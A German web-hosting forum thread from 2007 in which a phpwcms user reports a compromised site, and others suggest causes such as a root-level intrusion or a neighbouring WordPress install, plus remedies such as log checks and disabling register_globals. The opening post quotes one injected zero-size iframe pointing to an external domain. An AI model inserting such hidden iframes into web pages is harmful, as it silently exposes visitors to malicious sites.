phpwcms 1.3.0 Installation möglicherweise gehackt?

fitus · Post by **fitus** » Thu 3. May 2007, 14:46

Hallo Leute ich hab heute bemerkt, dass meine phpwcms installation vermutlich gehackt wurde, und zwar sieht mein html-code den wcms im back !!! und frontend ausgibt so aus. das kann nicht normal sein.

diese ganzen iframes waren gestern noch nicht da. woher kommt das?
ist das in der 1.3.3 behoben?

Code: Select all

<iframe src="http://www.siyamiozkan-mavideniz.org" frameborder="0" width="0" height="0"></iframe>
...

Post by **flip-flop** » Thu 3. May 2007, 16:08

Hallo fitus,

diese ganzen iframes waren gestern noch nicht da. woher kommt das?
ist das in der 1.3.3 behoben?

Was soll da behoben sein?
Glaubst du das cms System liefert diesen Mist?

Hast du irgendwelche Fremdmodule oder Input Einheiten installiert (Gästebuch, Formular, Login .....?
Schwaches PW?
Offene Verzeichnisse/Dateien?
Hacks installiert?

Ich würde die Logdateien durchsehen, wenn möglich.

Knut

marcus@localhorst · Post by **marcus@localhorst** » Thu 3. May 2007, 16:50

flip-flop wrote: Ich würde die Logdateien durchsehen, wenn möglich.

genau, da hat jemand deine index.php und phpwcms.php dateien editiert, über welchen weg auch immer, aber das muss nix mit phpwcms zu tun haben...

Post by **Oliver Georgi** » Thu 3. May 2007, 19:25

das klingt nach einem Einbruch von woanders her - was hast Du sonst auf dem System betrieben?

Und sicher register_globals an.

Oder noch ein Wordpress drauf - siehe Meldung von heute bei Heise.

Da man von phpwcms aus keine Schreibrechte auf die php-Dateien bekommt, kann es eigentlich nur über root-Rechte auf Deinem Server erfolgt sein.

Wende Dich an Deinen Provider, dass dieser das mal gegencheckt.

Deinen Titel habe ich geändert, da zumindest phpwcms nicht gehackt wurde - glaube ich nicht. Dann wären bereits andere davon betroffen.

Oliver

Jensensen · Post by **Jensensen** » Thu 3. May 2007, 19:37

check auch mal in der SQL die
table `phpwcms_user` und `phpwcms_userlog`

bei mir waren mal ganz merkwürdige user anmeldungen (versuche ?!) über die login.php bei der v.1.2.8
jedenfalls standen dort komische user namen – wie auch immer die da rein gekommen sind. und das, obwohl meine admin pwd's selten unter 10m lang sind!

inzwischen alles gelöscht und weg – wg. damaliger umlautproblematik alles frisch gemacht.
war aber sehr verwirrend...

greetz

fitus · Post by **fitus** » Thu 3. May 2007, 22:15

Hi Oli,

ich bin momentan duch die nachforschungen auf die schine extern gekommen,

ist ist auch in einer subdomain eine wordpress installiert, aber standard, ohne diese module, die sagen mir gar nichts.

Post by **Oliver Georgi** » Thu 3. May 2007, 22:58

wenn der Server anfällig ist, dann reicht, dass jemand anderes ein solches Script drauf hat.

Wie gesagt - die Änderungen sehen nicht nach Script hacking aus, sondern eher nach rootkit oder sowas.

Wird das System eventuell unter Plesk betrieben?

Bei welchem Provider läuft die Maschine?

Oliver

fitus · Post by **fitus** » Thu 3. May 2007, 23:02

nein soweit ich weiß ist da kein plesk drauf,

die sache läuft bei conhost - classic

hab mit dem admin geschrieben, ich zieh auf eine andere maschine, bei der php als fastcgi und unter user_id läuft und register_globals off ist.

Mfg
Dani

Post by **Oliver Georgi** » Thu 3. May 2007, 23:44

na dann kannst Du davon ausgehen, dass Du nicht alleine warst. Klingt nicht gerade vertrauenserweckend.

Oliver

fitus · Post by **fitus** » Fri 4. May 2007, 07:55

ich hab die logfiles duchgesehen, es fand kein zugriff per ftp statt. sicherheitstechnisch war der provider immer top. es kann dann eigentlich nur aus der wordpress installation kommen, aber nicht von meiner, da ich die beschriebenen module nicht drauf hab.

Post by **juergen** » Fri 4. May 2007, 08:23

fitus wrote:ich hab die logfiles duchgesehen, es fand kein zugriff per ftp statt.

Hallo,

wenn sich da jemand root Rechte erschlichen hat, wirst du da nichts sehen, falls du wirklich in die Logs des FTP Servers schauen kannst.

Die Sache mit Wordpress hat mich an den HYPE mit PHPWCMS und dem Kontaktformular erinnert.... plötzlich ist ein Programm für alle Schlechtigkeiten dieser Erde verantwortlich. Ein gut angebundener Server hat mitunter pro Stunde bis zu 15MB an Daten reiner ssh Bruteforce Bots.

Unterhalb der PHP Systeme gibt es noch ganz viele Türen und Fenster und jedes System welches sich mit priviligierten Rechten einschleichen kann, benötigt nur noch einen Linux Editor und baut deine Seiten ohne dein Zutun um.

Der Provider wird gut daran tun, die ganze Kiste neu zu bauen. Deswegen wohl das Umzugsangebot

Post by **Oliver Georgi** » Fri 4. May 2007, 08:45

ich wollte mit meinem Post nicht Wordpress schlecht machen, ging eher um "Module" -> ich sehe selber jeden Tag, was User sich gedankenlos auf ihre Systeme ziehen oder noch schlimmer selber zusammenprogrammieren. Schaut mal hier im Forum, was da so teils gefragt wird...

Register_globals sollte IMMER aus sein und nur nach Prüfung des Providers für einen Account und nur im alleräußersten Notfall aktiviert werden. Geht dann meistens um betrieb alter Scripte. Aber alles was neu kommt, ist Schrott, wenn es genau eine solche Einstellung verlangt!

Oliver